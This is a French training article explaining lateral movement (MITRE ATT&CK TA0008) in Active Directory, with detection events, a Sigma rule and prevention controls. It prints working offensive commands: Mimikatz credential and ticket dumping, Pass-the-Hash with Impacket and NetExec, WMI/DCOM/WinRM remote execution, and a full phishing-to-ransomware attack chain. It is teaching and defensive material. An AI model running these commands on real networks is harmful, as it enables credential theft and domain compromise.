Zeroday Cyber Academy

Pentest

Lateral movement : définition, techniques et détection 2026

Lateral movement MITRE ATT&CK TA0008 : définition, techniques (Pass-the-Hash, Pass-the-Ticket, PsExec, WMI, WinRM, RDP, SSH), détection Sigma, prévention 2026.

Naim Aouaichia
14 min de lecture
  • Lateral movement
  • MITRE ATT&CK
  • Active Directory
  • Pentest
  • Red team
  • Blue team
  • Pass-the-Hash
  • Kerberos

Le lateral movement (mouvement latéral, est-ouest movement) désigne l'ensemble des techniques par lesquelles un attaquant déjà présent sur un système étend sa présence en compromettant d'autres machines du même réseau. Formalisé dans la tactique TA0008 du framework MITRE ATT&CK, il se situe entre l'Initial Access et la Collection / Exfiltration / Impact dans la kill chain typique. L'objectif : atteindre les actifs à haute valeur (Domain Controllers, serveurs DB, bastions admin, backup) depuis un point d'entrée souvent peu privilégié (poste utilisateur via phishing, VPN compromis, serveur web non patché). Les techniques dominantes en 2026 en environnement Windows/AD : Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, exécution distante via PsExec/WMI/WinRM/DCOM/RDP/SSH, relais NTLM. Dans le cloud, le lateral movement shift vers Token Theft, AssumeRole chains et Workload Identity abuse. La détection impose une corrélation multi-sources (Windows Events, EDR behavioral, NDR réseau) et les règles Sigma publiques couvrent les patterns classiques. La prévention repose principalement sur le tiering Active Directory, la désactivation de NTLM, l'activation de LAPS, la segmentation réseau fine et la MFA phishing-resistant sur les comptes privilégiés. Cet article détaille la définition MITRE, les 15 techniques majeures, les outils offensifs, les méthodes de détection et le plan de prévention.

Définition MITRE ATT&CK et position dans la kill chain

Le framework MITRE ATT&CK v15

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) est la taxonomie de référence depuis 2013 pour décrire les comportements adverses. En 2026, la version 15 couvre 14 tactiques enterprise et plus de 200 techniques distinctes.

Les 14 tactiques Enterprise (dans l'ordre logique typique) :
 
  TA0043  Reconnaissance
  TA0042  Resource Development
  TA0001  Initial Access
  TA0002  Execution
  TA0003  Persistence
  TA0004  Privilege Escalation
  TA0005  Defense Evasion
  TA0006  Credential Access
  TA0007  Discovery
  TA0008  Lateral Movement      ← notre sujet
  TA0009  Collection
  TA0011  Command and Control
  TA0010  Exfiltration
  TA0040  Impact

Position du lateral movement

Le lateral movement intervient après l'Initial Access + Privilege Escalation initial et avant la Collection / Exfiltration. Dans un incident typique :

1. Initial Access (TA0001)
   Phishing → exécution de macro malveillante
   → poste utilisateur A compromis, shell attaquant
 
2. Privilege Escalation (TA0004) + Credential Access (TA0006)
   LSASS dump → hashes NTLM et Kerberos des comptes loggués
 
3. Discovery (TA0007)
   BloodHound ingestion → cartographie chemins d'escalade AD
 
4. Lateral Movement (TA0008) ← ICI
   Pass-the-Hash vers serveur B avec hash admin local réutilisé
   WMIExec vers C contenant données sensibles
   PsExec vers DC pour DCSync
 
5. Collection (TA0009)
   Dump NTDS.dit, exfiltration documents RH
 
6. Exfiltration (TA0010)
   HTTPS vers C2, split large via DNS
 
7. Impact (TA0040)
   Ransomware déployé sur tout le domaine

Les 15 techniques de lateral movement MITRE ATT&CK

Le framework recense les techniques suivantes sous TA0008.

Tech IDNomRésumé
T1021.001Remote Services - RDPConnexion Remote Desktop Protocol
T1021.002Remote Services - SMB/Windows Admin SharesC$, ADMIN$, PsExec-like
T1021.003Remote Services - Distributed Component Object ModelDCOM abuse
T1021.004Remote Services - SSHOpenSSH lateral
T1021.005Remote Services - VNCRemote Frame Buffer
T1021.006Remote Services - Windows Remote ManagementWinRM PowerShell Remoting
T1021.007Remote Services - Cloud ServicesAssumeRole, Switch Role (AWS)
T1021.008Remote Services - Direct Cloud VM ConnectionsAzure Bastion, EC2 Connect
T1080Taint Shared ContentModifier fichiers sur file share
T1210Exploitation of Remote ServicesCVE sur services réseau
T1534Internal SpearphishingPhishing interne depuis compte compromis
T1563Remote Service Session HijackingHijack RDP/SSH existant
T1570Lateral Tool TransferCopier outils vers système cible
T1072Software Deployment ToolsSCCM, Kaseya abuse
T1550Use Alternate Authentication MaterialPTH, PTT, Token

Pass-the-Hash, Pass-the-Ticket et Overpass-the-Hash

Ces trois techniques sont les plus spécifiques à Active Directory et les plus fréquentes en pentest enterprise.

Pass-the-Hash (PTH) - T1550.002

Exploite l'authentification NTLM : le serveur ne demande pas le mot de passe en clair, il demande un défi chiffré avec le hash NTLM. Un attaquant qui possède le hash peut s'authentifier sans jamais connaître le mot de passe.

# Dump des hashes avec Mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
 
# Résultat : hash NTLM d'alice : 92937945b518814341de3f726500d4ff
 
# Pass-the-Hash avec Impacket
psexec.py -hashes :92937945b518814341de3f726500d4ff corp.local/alice@10.0.0.50
 
# Pass-the-Hash avec NetExec
netexec smb 10.0.0.50 -u alice -H 92937945b518814341de3f726500d4ff -x "whoami"

Pass-the-Ticket (PTT) - T1550.003

Injecter un ticket Kerberos (TGT ou TGS) volé dans la session courante pour s'authentifier auprès de services.

# Dump des tickets Kerberos
mimikatz # sekurlsa::tickets /export
# Génère des fichiers .kirbi
 
# Injection du ticket dans la session
mimikatz # kerberos::ptt [0;abc].kirbi
 
# Vérification
klist  # affiche le ticket injecté
 
# Accès au service
dir \\fileserver.corp.local\sensitive-data\

Overpass-the-Hash (Over-PTH) - T1550.002 variant

Utiliser un hash NTLM pour demander un TGT Kerberos légitime. Permet de pivoter de NTLM vers Kerberos et d'éviter certaines détections PTH pures.

# Mimikatz
mimikatz # sekurlsa::pth /user:alice /domain:corp.local /ntlm:92937945...
# Ouvre une nouvelle cmd avec le ticket Kerberos correspondant
 
# Puis accès aux services
psexec \\server.corp.local cmd.exe

Différences clés

AspectPass-the-HashPass-the-TicketOverpass-the-Hash
ProtocoleNTLMKerberosNTLM → Kerberos
Pré-requisHash NTLMTGT ou TGSHash NTLM
DétectionEvents NTLM anormauxEvents Kerberos anormauxPlus subtile
Parade principaleDisable NTLMDétection KerberosDisable RC4, AES + Credential Guard

Outils d'exécution distante

SMB / Windows Admin Shares - T1021.002

Le classique. Utilise les shares administratifs (C$, ADMIN$, IPC$) pour copier un binaire puis l'exécuter via un service Windows.

# Impacket psexec (nécessite SMB admin rights)
psexec.py corp.local/alice:password@10.0.0.50
 
# Impacket smbexec (alternative sans upload de binaire persistant)
smbexec.py corp.local/alice:password@10.0.0.50
 
# NetExec multi-cible
netexec smb 10.0.0.0/24 -u alice -p password -x "whoami"

Détection : Event ID 7045 (service installation), 5140/5145 (share access), EDR behavioral.

WMI (Windows Management Instrumentation) - T1047 + T1021.002 hybride

# Impacket wmiexec
wmiexec.py corp.local/alice:password@10.0.0.50
 
# Exécution commande distante via wmic
wmic /node:10.0.0.50 /user:alice /password:password process call create "cmd.exe /c whoami"

Détection : Events 4688 process wmiprvse.exe parent, Sysmon EID 1 avec cmd enfant anormal.

WinRM / PowerShell Remoting - T1021.006

Protocole officiel Microsoft pour remote management. Par défaut sur ports 5985/5986.

# PowerShell native
Enter-PSSession -ComputerName server01.corp.local -Credential alice
Invoke-Command -ComputerName server01 -ScriptBlock { Get-Process }
 
# Evil-winrm (offensif)
evil-winrm -i 10.0.0.50 -u alice -p password
 
# Impacket
atexec.py corp.local/alice:password@10.0.0.50 whoami  # via scheduled tasks

Détection : Events 4624 logon type 3 avec process wsmprovhost.exe, Sysmon EID 4104 PowerShell ScriptBlock logging.

DCOM (Distributed COM) - T1021.003

Abuse d'objets COM autorisés à distance (MMC20.Application, ShellWindows, ShellBrowserWindow).

# Impacket dcomexec
dcomexec.py corp.local/alice:password@10.0.0.50
 
# PowerShell
$com = [Type]::GetTypeFromProgID("MMC20.Application","10.0.0.50")
$obj = [System.Activator]::CreateInstance($com)
$obj.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami","7")

Détection : événements WMI/COM activation anormaux, Sysmon EID 1 + EID 13 registry.

RDP (Remote Desktop Protocol) - T1021.001

RDP avec compte valide ou PTT ticket.

# Avec credentials
xfreerdp /u:alice /p:password /v:10.0.0.50
 
# Avec PTH (si Restricted Admin Mode)
xfreerdp /u:alice /pth:92937945... /v:10.0.0.50 /restricted-admin

Détection : Event 4624 type 10 (remote interactive), nouveau logon depuis IP inhabituelle.

SSH - T1021.004

Windows Server 2022+ supporte OpenSSH nativement. Lateral movement SSH avec clé volée ou mot de passe.

ssh alice@10.0.0.50
# Avec clé privée exfiltrée
ssh -i stolen_id_rsa alice@10.0.0.50

Exemple de chaîne d'attaque complète

Scénario type en environnement Windows AD :

Jour J - Initial Access (TA0001)
  Phishing macro Word → exécution PowerShell → reverse shell attaquant
  Compromission : poste utilisateur alice@corp.local (standard user)
 
Jour J - Credential Access (TA0006)
  LSASS dump via Mimikatz
  Obtention : hash NTLM alice + hash NTLM admin local (même mot de passe sur tous les postes)
 
Jour J - Discovery (TA0007)
  BloodHound ingestion via SharpHound
  Identification : 50 postes avec admin local partagé, 3 servers accessibles, path vers Domain Admin
 
Jour J - Lateral Movement (TA0008)
  Étape 1 : PsExec vers 15 postes avec admin local (Pass-the-Hash)
  Étape 2 : WMI vers file server (alice a accès via ACE)
  Étape 3 : dump credentials de chaque poste visité
 
Jour J+1 - Privilege Escalation (TA0004)
  Obtention hash d'un compte Tier 1 avec delegation unconstrained
  TGT forge via Rubeus
 
Jour J+1 - Lateral Movement encore (TA0008)
  Overpass-the-Hash vers Domain Controller via TGT
 
Jour J+1 - Impact (TA0040)
  DCSync sur DC → tous les hashes du domaine
  Golden Ticket pour persistence
  Déploiement ransomware via GPO malveillante
 
Durée totale : 24-36 heures selon industrialisation

Détection du lateral movement

Sources de télémétrie essentielles

Windows Security Events (sur tous postes + DC) :
 
  4624 Logon Success
    Type 3 (network) : SMB, RPC, WMI
    Type 10 (RemoteInteractive) : RDP
    Avec IpAddress source inhabituelle = suspect
 
  4625 Logon Failure
    Pattern brute force ou spray
    Cross-machine depuis même source = suspect
 
  4648 Logon with explicit credentials
    Commande runas, PsExec, outil offensif
    Suspect si source = process non standard
 
  4672 Special privileges assigned to new logon
    Nouveau logon avec privilèges admin
    Alerter si compte hors Tier 0 sur Tier 0 asset
 
  4688 Process creation
    Processus wmiprvse.exe, wsmprovhost.exe spawned anormalement
    PowerShell avec command-line encoded
 
  4769 Kerberos TGS request
    Encryption type 0x17 (RC4) sur compte avec SPN = Kerberoasting
    Encryption type 0x12 (AES256) préféré
 
  5140 / 5145 Share access
    ADMIN$, C$, IPC$ hors heures normales = suspect
 
  7045 Service installation
    PsExec crée un service nommé PSEXESVC
    Services aux noms aléatoires = suspect
 
Sysmon (via SwiftOnSecurity config) :
  EID 1 ProcessCreate
  EID 3 NetworkConnect
  EID 8 CreateRemoteThread
  EID 10 ProcessAccess (LSASS)
  EID 13 RegistryValueSet
  EID 22 DnsQuery

Détection comportementale EDR

Les EDR modernes (Defender for Endpoint, CrowdStrike, SentinelOne) détectent automatiquement :

  • Exécution de Mimikatz, Impacket (signatures + comportements).
  • LSASS access par processus non autorisé.
  • Création de service PSEXESVC ou service avec nom aléatoire.
  • Requêtes Kerberos RC4 ciblant des comptes SPN.
  • Authentification d'un compte admin depuis un poste inhabituel.

Règles Sigma communautaires

Le repo SigmaHQ/sigma maintient 100+ règles lateral movement publiques.

# Exemple Sigma - Remote WMI lateral movement
title: Remote WMIEXEC Lateral Movement
id: bde0a2f1-...
description: Detects remote WMI execution via wmiprvse spawning cmd.exe
status: stable
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\wmiprvse.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: selection
level: high
tags:
  - attack.lateral_movement
  - attack.t1021.002
  - attack.t1047

Network Detection (NDR / NTA)

Analyse du trafic est-ouest pour détecter :

  • SMB connections entre postes utilisateurs (rare en normal).
  • Kerberos ticket requests à fréquence anormale.
  • WinRM / WSMan trafic depuis sources inhabituelles.
  • RDP depuis poste utilisateur vers server sensible.

Solutions : Darktrace, Vectra AI, ExtraHop Reveal(x), open source avec Zeek + Suricata + ML.

Prévention : les 10 contrôles qui comptent

Isolation et tiering

  1. Tiering model AD strictement appliqué (Tier 0/1/2 étanches). Comptes Tier 0 ne loguent JAMAIS sur Tier 1 ou 2.
  2. Segmentation réseau fine : VLAN, microsegmentation Kubernetes (Cilium NetworkPolicy, Istio AuthorizationPolicy), pare-feu interne.
  3. PAW (Privileged Access Workstations) pour admins Tier 0. Postes physiques dédiés, pas d'email/web.

Authentification et credentials

  1. LAPS (Local Administrator Password Solution) : rotation automatique du mot de passe admin local. Casse les PTH transversaux.
  2. Credential Guard activé (Windows 10 Enterprise+) : isole LSASS via virtualization-based security.
  3. MFA phishing-resistant sur comptes privilégiés (FIDO2, Smart Card, Windows Hello for Business).
  4. Disable NTLM et SMBv1 partout via GPO. Kerberos AES256 + armoring seuls acceptés.

Détection et réponse

  1. Microsoft Defender for Identity sur tous les Domain Controllers. Détection comportementale native.
  2. EDR moderne (Defender for Endpoint P2, CrowdStrike, SentinelOne) avec tuning règles lateral movement.
  3. Règles Sigma importées dans le SIEM, corrélation multi-host pour chains d'events anormaux.

Outils offensifs à connaître (contexte pentest autorisé)

Suite Impacket (Python, OSS, SecureAuth Labs)
  psexec.py, smbexec.py, wmiexec.py, atexec.py, dcomexec.py
  Secretsdump.py, ticketer.py, getTGT.py, getST.py
  Standard absolu du pentest AD
 
NetExec (anciennement CrackMapExec, OSS actif 2023+)
  Multi-protocole : SMB, WinRM, LDAP, MSSQL, SSH, RDP, WMI
  Découverte + authentification + exécution en un seul outil
  Intégration BloodHound, Mimikatz modules
 
Mimikatz (Benjamin Delpy, OSS)
  Référence pour PTH, PTT, Overpass, DCSync
  Intégré dans Cobalt Strike, Empire, plusieurs C2
 
Rubeus (.NET, OSS)
  Focus Kerberos : Kerberoasting, AS-REP, Golden/Silver Ticket, PTT
  Accessibles depuis Cobalt Strike beacon
 
Evil-WinRM (Ruby, OSS)
  Shell WinRM interactif enrichi
 
Chisel, ligolo-ng (Go, OSS)
  Tunneling TCP/UDP via HTTP
  Pivoter depuis un host compromis
 
C2 frameworks modernes :
  Sliver (BishopFox, OSS) : alternative Cobalt Strike
  Havoc (OSS) : moderne, actif développement
  Mythic (OSS) : modulaire
 
Commercial :
  Cobalt Strike : standard red team professionnel (~3 540 USD/an)
  Core Impact : alternative

Rappel légal critique : ces outils s'utilisent uniquement dans un cadre autorisé : pentest avec contrat signé, red team interne, CTF, labs personnels (HackTheBox, TryHackMe, lab local). Leur usage non autorisé constitue une infraction pénale (LCEN article 323-1 et suivants en France).

Plan d'apprentissage lateral movement 2026

Débutant (0-3 mois) :
  MITRE ATT&CK TA0008 lecture complète
  TryHackMe : Lateral Movement and Pivoting path
  HackTheBox Academy : AD Enumeration + Pivoting labs
  Lab local : GOAD (Game of Active Directory) ou DetectionLab
 
Intermédiaire (3-9 mois) :
  HackTheBox AD boxes (Forest, Sauna, Active, Resolute)
  CRTP (Certified Red Team Professional, Altered Security)
  Maîtrise Impacket, NetExec, Rubeus, Mimikatz
  Write-ups communautaires et conférences (DEFCON, SSTIC, Hexacon)
 
Avancé (9+ mois) :
  OSCP + OSEP (exploit dev et evasion)
  CRTL (Certified Red Team Lead)
  SANS SEC565 Red Team Ops
  Custom tooling : écrire ses propres implants
 
Blue team parallèle :
  Microsoft Defender for Identity training
  Sigma rule writing intensive
  Purple team exercises (attack + detect)
  SANS FOR508 Advanced Incident Response

Points clés à retenir

  • Lateral movement = MITRE ATT&CK TA0008, ensemble des techniques pour étendre une compromission initiale vers d'autres systèmes. Position centrale dans la kill chain entre initial access et impact.
  • Techniques dominantes 2026 : 8 sous-techniques T1021 (SMB, WinRM, DCOM, RDP, SSH, VNC, Cloud, Direct VM), T1550 Use Alternate Auth (PTH, PTT, Token), T1570 Lateral Tool Transfer, T1534 Internal Spearphishing.
  • PTH / PTT / Overpass-the-Hash : trois techniques Windows majeures, chacune avec signature de détection distincte (NTLM events, Kerberos events, pattern hybride).
  • Outils offensifs OSS : Impacket suite, NetExec, Mimikatz, Rubeus, Evil-WinRM, Chisel, ligolo-ng. Cobalt Strike commercial. Sliver et Havoc comme alternatives modernes.
  • Détection 2026 : corrélation multi-sources Windows Events (4624 type 3/10, 4648, 4672, 4688, 4769, 5140, 5145, 7045) + Sysmon EID 1/3/8/10/13 + EDR behavioral + NDR réseau + règles Sigma communautaires.
  • Prévention : 10 contrôles prioritaires - tiering AD strict, LAPS, Credential Guard, MFA FIDO2 privileged, disable NTLM/SMBv1, Kerberos AES256 armoring, PAW, Defender for Identity, EDR moderne, SIEM + Sigma.
  • Temps moyen 2024 entre initial access et compromise Domain Admin : 1,5 jour (vs 5 jours en 2020). Industrialisation BloodHound + Impacket + NetExec explique la vitesse.

Pour maîtriser l'outillage concrètement, voir outils de base du pentester en 2026 qui couvre Impacket, NetExec, Rubeus et BloodHound. Pour comprendre l'environnement cible Active Directory, lire qu'est-ce qu'Active Directory : définition et sécurité 2026. Pour la détection côté SOC, consulter qu'est-ce qu'un EDR : définition, fonctionnement, outils 2026 et journalisation de sécurité : les bases. Pour le contexte méthodologique complet d'un pentest qui inclut lateral movement, qu'est-ce qu'un pentest externe détaille les 5 phases PTES.

Questions fréquentes

  • Qu'est-ce que le lateral movement exactement ?
    Le lateral movement (mouvement latéral, aussi appelé east-west movement) désigne l'ensemble des techniques par lesquelles un attaquant déjà présent sur un système d'information étend sa présence en compromettant d'autres machines du même réseau. C'est la tactique TA0008 du framework MITRE ATT&CK, située entre Initial Access / Execution / Persistence / Privilege Escalation et Collection / Exfiltration / Impact. Objectif : atteindre les actifs à haute valeur (serveurs DB, file shares sensibles, Domain Controllers) à partir d'un point d'entrée initial souvent un poste utilisateur peu privilégié.
  • Quelles sont les techniques de lateral movement les plus utilisées ?
    Huit techniques dominent en 2026 : T1021.002 SMB/Windows Admin Shares (PsExec, smbexec), T1021.006 WinRM (PowerShell Remoting), T1021.003 DCOM (MMC20.Application, ShellWindows), T1021.001 RDP, T1021.004 SSH, T1550.002 Pass-the-Hash, T1550.003 Pass-the-Ticket, T1021.005 VNC. Les techniques Active Directory-spécifiques (Kerberos, NTLM) dominent dans les environnements enterprise. Dans le cloud (AWS, Azure, GCP), les techniques shift vers TokenStealing, AssumeRole chains, et Workload Identity abuse.
  • Quelle différence entre Pass-the-Hash, Pass-the-Ticket et Overpass-the-Hash ?
    Trois techniques Windows complémentaires. Pass-the-Hash (PTH) : utiliser un hash NTLM volé sans connaître le mot de passe en clair, authentification NTLM directe. Pass-the-Ticket (PTT) : injecter un ticket Kerberos volé (TGT ou TGS) dans la session courante, authentification Kerberos. Overpass-the-Hash : utiliser un hash NTLM pour demander un TGT Kerberos légitime - permet de pivoter NTLM vers Kerberos et d'éviter certaines détections PTH. Mimikatz supporte les trois. La détection diffère : PTH via NTLM events, PTT via Kerberos events anormaux.
  • Comment détecter un lateral movement en 2026 ?
    Corrélation multi-sources obligatoire. Côté Windows : Events 4624 type 3 (network logon), 4648 (explicit credentials), 4688 (process creation avec cmd/powershell/wmic anormal), 4769 (TGS request suspect), 5140/5145 (share access), 7045 (service installation PsExec). Côté EDR : détection comportementale (Mimikatz, Rubeus, Impacket artifacts). Côté réseau : NDR / NTA pour analyse est-ouest anormale. Règles Sigma publiques sur SigmaHQ. Microsoft Defender for Identity corrèle ces signaux sur les Domain Controllers.
  • Comment prévenir le lateral movement dans une entreprise ?
    Dix contrôles cumulatifs efficaces. 1) Tiering model AD (Tier 0/1/2 étanches). 2) LAPS pour rotation des mots de passe admin locaux (plus de PTH transversal). 3) Désactiver NTLM et SMBv1. 4) Kerberos AES256 + armoring, pas de RC4. 5) MFA sur comptes privilégiés (FIDO2). 6) Segmentation réseau fine (microsegmentation K8s, VLAN, EDR enforcement). 7) PAW pour admins Tier 0. 8) Credential Guard et Windows Defender Application Control. 9) Restrictions sur admin shares (disable C$, ADMIN$ via GPO si possible). 10) Détection EDR + Microsoft Defender for Identity.
  • Quels outils offensifs sont utilisés pour le lateral movement ?
    Top 8 outils red team 2026 : Impacket suite (psexec.py, smbexec.py, wmiexec.py, atexec.py, dcomexec.py), NetExec ex-CrackMapExec (multi-protocole SMB/WinRM/LDAP/MSSQL/SSH), Mimikatz (PTH, PTT, Overpass), Rubeus (Kerberos abuse), evil-winrm (WinRM shell interactif), Chisel et ligolo-ng (tunneling pour pivoter), Sliver et Havoc (C2 frameworks modernes), Cobalt Strike (commercial, historique red team). Tous présupposent une présence initiale : utiliser responsablement, dans un cadre légal (pentest autorisé, CTF, lab personnel).
Découvrir le bootcamp DevSecOps

Écrit par

Naim Aouaichia

Expert cybersécurité et fondateur de Zeroday Cyber Academy

Expert cybersécurité avec un master spécialisé et un parcours hybride : développement, DevOps, DevSecOps, SOC, GRC. Fondateur de Hash24Security et Zeroday Cyber Academy. Formateur et créateur de contenu technique sur la cybersécurité appliquée, la sécurité des LLM et le DevSecOps.

À lire également